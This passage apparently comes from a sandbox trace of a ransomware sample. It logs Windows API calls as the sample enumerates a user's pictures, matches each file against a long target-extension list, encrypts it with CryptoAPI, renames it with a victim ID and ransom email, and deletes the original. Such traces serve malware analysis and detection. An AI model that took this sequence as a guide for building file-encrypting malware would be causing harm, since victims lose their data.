gb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0196.610] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0196.610] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0196.610] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\bxtp1ubjz_.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\bxtp1ubjz_.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0196.614] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xceed, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0xceed, lpOverlapped=0x0) returned 1
	[0196.617] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.617] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcaef0) returned 1
	[0196.714] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.714] CryptCreateHash (in: hProv=0xfcaef0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0196.714] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.715] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0196.715] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.715] CryptDeriveKey (in: hProv=0xfcaef0, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb93b0) returned 1
	[0196.715] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.715] CryptEncrypt (in: hKey=0xfb93b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0xceed, dwBufLen=0xceed | out: pbData=0x0*, pdwDataLen=0x18af1c*=0xcef0) returned 1
	[0196.717] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.718] RtlMoveMemory (in: Destination=0xfea078, Source=0xfdd180, Length=0xceed | out: Destination=0xfea078) 
	[0196.718] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.718] CryptEncrypt (in: hKey=0xfb93b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfea078*, pdwDataLen=0x18aefc*=0xceed, dwBufLen=0xcef0 | out: pbData=0xfea078*, pdwDataLen=0x18aefc*=0xcef0) returned 1
	[0196.718] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.718] CryptDestroyKey (hKey=0xfb93b0) returned 1
	[0196.719] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.719] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0196.719] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.719] CryptReleaseContext (hProv=0xfcaef0, dwFlags=0x0) returned 1
	[0196.719] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.719] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0196.720] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.720] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0196.722] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\bxtp1ubjz_.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 100
	[0196.722] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\bxtp1ubjz_.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\bxtp1ubjz_.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0196.723] WriteFile (in: hFile=0x388, lpBuffer=0xfea078*, nNumberOfBytesToWrite=0xcef0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfea078*, lpNumberOfBytesWritten=0x18b358*=0xcef0, lpOverlapped=0x0) returned 1
	[0196.730] CloseHandle (hObject=0x388) returned 1
	[0196.730] CloseHandle (hObject=0x2c0) returned 1
	[0196.730] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\bxtp1ubjz_.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\bxtp1ubjz_.jpg")) returned 1
	[0196.735] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\bxtp1ubjz_.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\bxtp1ubjz_.jpg")) returned 0
	[0196.735] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fccbc60, ftCreationTime.dwHighDateTime=0x1d96f6f, ftLastAccessTime.dwLowDateTime=0x65f66ee0, ftLastAccessTime.dwHighDateTime=0x1d97266, ftLastWriteTime.dwLowDateTime=0x65f66ee0, ftLastWriteTime.dwHighDateTime=0x1d97266, nFileSizeHigh=0x0, nFileSizeLow=0x6bc7, dwReserved0=0x0, dwReserved1=0x0, cFileName="DoKcTgdprST.jpg", cAlternateFileName="DOKCTG~1.JPG")) returned 1
	[0196.735] lstrcmpW (lpString1="DoKcTgdprST.jpg", lpString2="..") returned 1
	[0196.736] lstrcmpW (lpString1="DoKcTgdprST.jpg", lpString2=".") returned 1
	[0196.736] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\"
	[0196.736] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\", lpString2="DoKcTgdprST.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\DoKcTgdprST.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\DoKcTgdprST.jpg"
	[0196.736] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\DoKcTgdprST.jpg") returned 59
	[0196.736] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0196.736] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\DoKcTgdprST.jpg", cchLength=0x3b | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\dokctgdprst.jpg") returned 0x3b
	[0196.736] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.737] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\dokctgdprst.jpg", lpSrch="help_decrypt_your_files") returned 0x0
	[0196.737] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\dokctgdprst.jpg" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\dokctgdprst.jpg") returned="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\dokctgdprst.jpg"
	[0196.737] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\dokctgdprst.jpg") returned 59
	[0196.737] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.737] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.737] StrStrW (lpFirst=".jpg", lpSrch=".") returned=".jpg"
	[0196.737] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.738] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".jpg") returned=".jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0196.738] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0196.738] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0196.738] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\dokctgdprst.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\dokctgdprst.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0196.741] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x6bc7, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x6bc7, lpOverlapped=0x0) returned 1
	[0196.744] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.744] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb000) returned 1
	[0196.746] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.747] CryptCreateHash (in: hProv=0xfcb000, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0196.747] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.747] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0196.747] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.747] CryptDeriveKey (in: hProv=0xfcb000, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9130) returned 1
	[0196.747] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.748] CryptEncrypt (in: hKey=0xfb9130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x6bc7, dwBufLen=0x6bc7 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x6bd0) returned 1
	[0196.748] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.749] RtlMoveMemory (in: Destination=0xfe3d50, Source=0xfdd180, Length=0x6bc7 | out: Destination=0xfe3d50) 
	[0196.749] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.749] CryptEncrypt (in: hKey=0xfb9130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe3d50*, pdwDataLen=0x18aefc*=0x6bc7, dwBufLen=0x6bd0 | out: pbData=0xfe3d50*, pdwDataLen=0x18aefc*=0x6bd0) returned 1
	[0196.749] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.749] CryptDestroyKey (hKey=0xfb9130) returned 1
	[0196.749] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.750] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0196.750] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.750] CryptReleaseContext (hProv=0xfcb000, dwFlags=0x0) returned 1
	[0196.750] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.750] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0196.751] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.751] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0196.752] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\dokctgdprst.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 101
	[0196.752] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\dokctgdprst.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\dokctgdprst.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0196.753] WriteFile (in: hFile=0x388, lpBuffer=0xfe3d50*, nNumberOfBytesToWrite=0x6bd0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfe3d50*, lpNumberOfBytesWritten=0x18b358*=0x6bd0, lpOverlapped=0x0) returned 1
	[0196.756] CloseHandle (hObject=0x388) returned 1
	[0196.756] CloseHandle (hObject=0x2c0) returned 1
	[0196.757] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\dokctgdprst.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\dokctgdprst.jpg")) returned 1
	[0196.763] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\dokctgdprst.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\dokctgdprst.jpg")) returned 0
	[0196.763] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81ff4880, ftCreationTime.dwHighDateTime=0x1d96d2c, ftLastAccessTime.dwLowDateTime=0x76a3550, ftLastAccessTime.dwHighDateTime=0x1d970db, ftLastWriteTime.dwLowDateTime=0x76a3550, ftLastWriteTime.dwHighDateTime=0x1d970db, nFileSizeHigh=0x0, nFileSizeLow=0x48bf, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hg1HF_Lrt.png", cAlternateFileName="HG1HF_~1.PNG")) returned 1
	[0196.763] lstrcmpW (lpString1="Hg1HF_Lrt.png", lpString2="..") returned 1
	[0196.763] lstrcmpW (lpString1="Hg1HF_Lrt.png", lpString2=".") returned 1
	[0196.763] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\"
	[0196.764] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\", lpString2="Hg1HF_Lrt.png" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\Hg1HF_Lrt.png") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\Hg1HF_Lrt.png"
	[0196.764] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\Hg1HF_Lrt.png") returned 57
	[0196.764] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
